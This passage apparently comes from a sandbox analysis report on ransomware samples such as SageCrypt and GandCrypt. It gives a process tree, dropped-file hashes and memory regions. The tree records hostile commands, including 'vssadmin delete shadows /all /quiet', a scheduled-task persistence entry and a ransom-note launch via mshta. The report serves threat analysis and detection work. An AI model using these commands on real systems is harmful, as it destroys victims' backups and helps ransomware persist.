          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1692
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
          Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of WriteProcessMemory
          PID:2740
          • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
            "C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe" g
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:568
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1652
          • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
            "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Enumerates connected drives
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            • Modifies Control Panel
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:1788
            • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
              "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3532
            • C:\Windows\SysWOW64\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              • Interacts with shadow copies
              PID:1260
            • C:\Windows\SysWOW64\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              • Interacts with shadow copies
              PID:4612
            • C:\Windows\SysWOW64\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              • Interacts with shadow copies
              PID:596
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              PID:2664
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3188
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:908
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 2
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:3184
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2696
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt
              2⤵
                PID:4316
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2448
            • C:\Windows\SysWOW64\DllHost.exe
              C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
              1⤵
              • System Location Discovery: System Language Discovery
              PID:4244

            Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab.id-2FA84094.[[email protected]].arena
              Filesize: 23.5MB
              MD5: c113065c025c3f5052fc44118477b4ce
              SHA1: d59147bd75a05fdd34b36fd1920f59d8f6490786
              SHA256: ba96cdfe51b885d1c0b0d3b24257701db6b06dbf60fd892dabe90e0d3182a594
              SHA512: 27a5d761889fc62d1ed0d7f5c19f9067222fce336b5c2fa9e782a55f1ae18d8a2ed094208b6c284b7ca546aa0ccb46ae7f06d3890713ec8226f35b1c1b48ee17

            • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
              Filesize: 13KB
              MD5: b97891fffcc8b87fda8b4e2a0827b715
              SHA1: 9328a8763fb71586219f1f675213f092b776719d
              SHA256: 677eaea55f6fb6f64a7d116ff8357d49c5fdc3411dbc6dbb36ecb35ca5be4f08
              SHA512: 7f08e5642b144ca3f8f26c92a5f61fe57591b08c11d527f96d159f4c75f24b13782752cb66df2862cda766a3b276ea258bcfd5e04fdf8f3ce3684bc4feaf78bf

            • C:\Users\Admin\AppData\Local\Temp\__config252888.bat
              Filesize: 212B
              MD5: acce7e052ad182cab0096b2506c84893
              SHA1: 051ab4bd1f38e447e48704907b2f30c89c5de6a3
              SHA256: 0668e7fd81715c71f8f83935f562cc1fbeb49a84bcf2e396215b8b336ee91a3b
              SHA512: 1fd09c0ecbe093944fcd5b139aba159a2392887e7eb48db0b821bc5b494f8abd9908a47c906d6b590cfa8227fa3ee7205c16ff06ed64d280530fc114d2d4415a

            • C:\Users\Admin\AppData\Local\Temp\f1.vbs
              Filesize: 3KB
              MD5: 37219fd2d09abee4189a1ae33de93e2d
              SHA1: 5e4cc26e169b6bd16843bcc86806556dac372c57
              SHA256: 2a0d2418a2504ad14960dcff54f0892339eeed53e359585c9b04a29c4e6e4274
              SHA512: 626b89eb5b132ac43a6fb2d5dcc1c62349a6a48045a486835aa51c17348b0c4849cf5d56b4b56359c7bab5bdccaa04adf659f7486de84f9c14d86032272e5069

            • C:\Users\Admin\AppData\Roaming\YI89EL.exe
              Filesize: 575KB
              MD5: 67672448d587eaed5a23ee152d56c58a
              SHA1: 5d420fc8fcd41832077dd750273b3cb870f4f811
              SHA256: 48f187fa619bf8072f809aa32f1734115c03f14027d5fdcca6aed8d97c81f662
              SHA512: 707d3bfb257ad3ce68c522756bcafd26ebc73415ea2cd8cc242aaf90ca62833af002d0dd51189c14964cef0e1e5f895a2ab5c2ca8a002857927239539f046508

            • C:\Users\Admin\AppData\Roaming\s1qoaKDO.tmp
              Filesize: 72B
              MD5: 14a86b880d088d1d8e9e8a0ba1ffb0cb
              SHA1: 48fb8664a7cab9a7197f8ef8860ac53ba2c0a9fc
              SHA256: 5ea477113fe4736cd9ef3181f26b4c0bea5080a688560dbd8ea329d5a30acd1d
              SHA512: 6a9b4dd718566fd7b6ad3377348ac3521d3d2c9ca4e8c8d875d1b084075c101064c8c4df56f1591a53934368990ecf58a518dfc2e3dc33b8f1b609db13f9e0e0

            • C:\Users\Admin\Desktop\!HELP_SOS.hta
              Filesize: 64KB
              MD5: 50564fa3e6b3d467823f55204ba66039
              SHA1: 81c470e03dd7b72867be4c410bd8ed10a03ba65c
              SHA256: 6c7797ebf9837aad97c9ea7f844d2ca38babbb31264d500135869d80a6b305a6
              SHA512: 41a282751c3c47253650ce69558e7782edbf87df6390e6dffc42a4afb39cb5b316068b58beb773b191597233ad41dd20b9a5d27638e1765c700c95634d9e7ff0

            • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
              Filesize: 851KB
              MD5: d31d884ad7acf8ba3e88ec303758f4e7
              SHA1: da7cc352643a09a3a8a0ea61844e968df63b04fd
              SHA256: e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030
              SHA512: 4c50bd466cab12b64a876352f938fd3604aa7ff83bc1efbcb62e7f3d0b0e833f4988b29ed7fecad736e9093a9fac796296a21c55448ea54ea5458021f79788a0

            • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b.exe
              Filesize: 180KB
              MD5: 07c90ef39804b2f0ec6950b947defdb7
              SHA1: f9f987c58a174a6f19c4bfaace3f1c79bad5a638
              SHA256: a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b
              SHA512: beba4fc429542002d0f88851089bbd1e130b05189c3616307fe3d7999dccdf36c7c55450d116c4c33ef4496d658faa93d30806a1a1e4df7215d215f0a501b5fa

            • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
              Filesize: 135KB
              MD5: d3520267e15a2bec32b6ea456ff8a729
              SHA1: 54ead93e2cf5269344dc5300d2a645260e7cc26d
              SHA256: 57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850
              SHA512: 97871cc16a3ae9fc261137dd193456f5e822983303db47d6d29f26d763490aa74594625a81d6a443b874cb73c2c3cd2e8a3fffe6d42b20b5b3a9ca178a4eae7c

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.meia-b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6.exe
              Filesize: 63KB
              MD5: cdf5bba313fecd7d8f057085aedc7102
              SHA1: c4540f5be820ec3da14b0e4f3165c2e325cc33b3
              SHA256: b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6
              SHA512: 053d0042619232e8d10ee40e764dcd38595592320f0a8bdbc74c31aeccd4a21929e785b105c6b285194e0cd824e2775ae31ff58bca4383d58708c21c15c30cfe

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
              Filesize: 702KB
              MD5: d614a3d0af87ce7406abd323227c7578
              SHA1: a7d038e6e09ec8aaa44b2bfb091255301fa1bc66
              SHA256: 6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225
              SHA512: cc839d31101d25fb2777ca29b87a591111f4712aeb474bf5de072d97db2d4ca7fe513f0f292aab972a300be34ecaa423579df12bd5a267eb07217dfd85f0b1ae

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crusis.to-153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d.exe
              Filesize: 92KB
              MD5: 26bd8a37e289236f7f3508ae5969649c
              SHA1: 87576661fc5cd7f77e690a10b7f6117b053344bb
              SHA256: 153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d
              SHA512: 8a27314a1c9422ffdbfdc497d1f1d6decdbd951b73bf812d95ec15a971da7f61caeff6faef93f8e6a884f6014559ea2576fee4a42e2132cca3e9629f8aed1cf4

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crypren.acmd-082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76.exe
              Filesize: 799KB
              MD5: f6a8d7a4291c55020101d046371a8bda
              SHA1: 09b08e04ee85b26ba5297cf3156653909671da90
              SHA256: 082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76
              SHA512: 547ad8ac404e494cce474209ebfbe33a40b69feb59f564215622f479e98dd93699794f4950b05d21225af271c55987da24c68d7c4c172f1d99ba7050b7063888

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Foreign.nyqu-bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c.exe
              Filesize: 952KB
              MD5: caf27d615c9cf39b31442ef0c472e97c
              SHA1: 20e22c952f70706559efe57e1eec289ea89690fa
              SHA256: bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c
              SHA512: bf6b53a54912b31025e023955a3ec2ec1ca32f9f04c2544a4c7e1f6591943e315fa84a979b11a28a48a6ec04eeadd89ff243dde1693b6d71f13d6a1d1f2a549e

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
              Filesize: 286KB
              MD5: 05b7e80b215578e2c737549925daef10
              SHA1: d9e5cb291cda27026b696980e4d5a77cf878386b
              SHA256: 052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f
              SHA512: 4219da6bf750cc09f515c058eac16cbdc90f7c506d94309b842a8639a458a14bb6b39a592f346b02ce86b98828d081f609580fe82d2847df800330ff2c393106

            • C:\Users\Admin\Desktop\FILES ENCRYPTED.txt
              Filesize: 172B
              MD5: bfd68b480d75505dd76cddbe66a785bc
              SHA1: 3f5618ea508b40d9020556b4736abaa4da283b07
              SHA256: af4e1740143e8a58b2cb145f17f6f5810156ddd4a15138e7b544cac9122e64af
              SHA512: 76ccc51ecb90426df106b4689cc028052bb6294ad9e7c45b673161e6f29ac13e5479e25ad5304806bf38314aad348f9b551647e771558c09c4315cfba674d0f4

            • C:\Users\Admin\Desktop\LimitTrace.xlsx.ENCRYPTED
              Filesize: 9KB
              MD5: b2a92418da0acd77919f4c2cca5a34af
              SHA1: 1cdc3a150ef60a745d76187bcc1e4d4ca250bbb4
              SHA256: eede59d414a00de42531928ebe56ebd6b90dd5d78f7c62e8098ce00a036a0664
              SHA512: 8ab7110772bac7f6474ae37851dbf57034a7314c879cb44c1148126ec783fd971ef828f8c6e3435e432d17a92142345f6aa0d431a89b900a654185cf6397f540

            • C:\Users\Admin\Documents\READ_THIS_TO_DECRYPT.html
              Filesize: 1KB
              MD5: 55764b80badcdfe4337f538993fc3aab
              SHA1: 049ebb79ca8e78a30318d9eef6b37992572e1034
              SHA256: a53779746a2aec49c361f546b70a74508aac83c9ea8203af07f142abfa251b35
              SHA512: b8a94d01ad1ca07fd08a890a5b55b71d97d0fc3df705704812c18993872d1ed7360aea6a5fb7e388fd8cedbc2baa7cfabf4207f59becee2927aa1030fa60689b

            • memory/568-3666-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/568-164-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/568-199-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/756-20419-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp
              Filesize: 64KB
            • memory/1280-156-0x0000000000400000-0x00000000004DD000-memory.dmp
              Filesize: 884KB
            • memory/1328-20507-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize: 608KB
            • memory/1480-1101-0x00000000011A0000-0x00000000011B3000-memory.dmp
              Filesize: 76KB
            • memory/1692-8338-0x0000000000400000-0x00000000004F5000-memory.dmp
              Filesize: 980KB
            • memory/1692-20389-0x0000000000400000-0x00000000004F5000-memory.dmp
              Filesize: 980KB
            • memory/1788-3543-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/1788-20535-0x0000000002F70000-0x0000000002F80000-memory.dmp
              Filesize: 64KB
            • memory/1788-4107-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/1788-20482-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/1788-20390-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/1788-14320-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/1788-8489-0x0000000002F70000-0x0000000002F80000-memory.dmp
              Filesize: 64KB
            • memory/1792-26-0x00000000000E0000-0x00000000000F6000-memory.dmp
              Filesize: 88KB
            • memory/2696-20495-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20456-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-9643-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-9710-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20487-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20486-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20485-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20484-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20491-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20479-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20477-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20488-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20455-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20492-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20498-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20496-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-19-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-18-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-20497-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-17591-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-17564-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-18830-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2696-18828-0x0000000140000000-0x00000001405E8000-memory.dmp
              Filesize: 5.9MB
            • memory/2740-189-0x0000000002FB0000-0x0000000002FC0000-memory.dmp
              Filesize: 64KB
            • memory/2740-159-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/2740-3508-0x0000000002960000-0x00000000029AE000-memory.dmp
              Filesize: 312KB
            • memory/2740-47-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/2740-3592-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/2912-220-0x0000000000080000-0x0000000000093000-memory.dmp
              Filesize: 76KB
            • memory/2912-9936-0x0000000000080000-0x0000000000093000-memory.dmp
              Filesize: 76KB
            • memory/3016-35-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize: 72KB
            • memory/3016-32-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize: 72KB
            • memory/3016-46-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize: 72KB
            • memory/3024-8317-0x0000000000400000-0x00000000004BC000-memory.dmp
              Filesize: 752KB
            • memory/3024-13042-0x0000000000400000-0x00000000004BC000-memory.dmp
              Filesize: 752KB
            • memory/3532-14321-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/3532-4137-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/3532-4316-0x0000000000400000-0x000000000044E000-memory.dmp
              Filesize: 312KB
            • memory/3952-13031-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13331-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13039-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13037-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13035-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13033-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-20391-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13029-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13328-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13044-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-20499-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13330-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/3952-13329-0x0000000000400000-0x000000000040E000-memory.dmp
              Filesize: 56KB
            • memory/4072-20519-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp
              Filesize: 4KB
            • memory/4072-20517-0x0000000000020000-0x0000000000021000-memory.dmp
              Filesize: 4KB
            • memory/4072-20520-0x00000000004C0000-0x000000000058E000-memory.dmp
              Filesize: 824KB
            • memory/4708-20471-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp
              Filesize: 64KB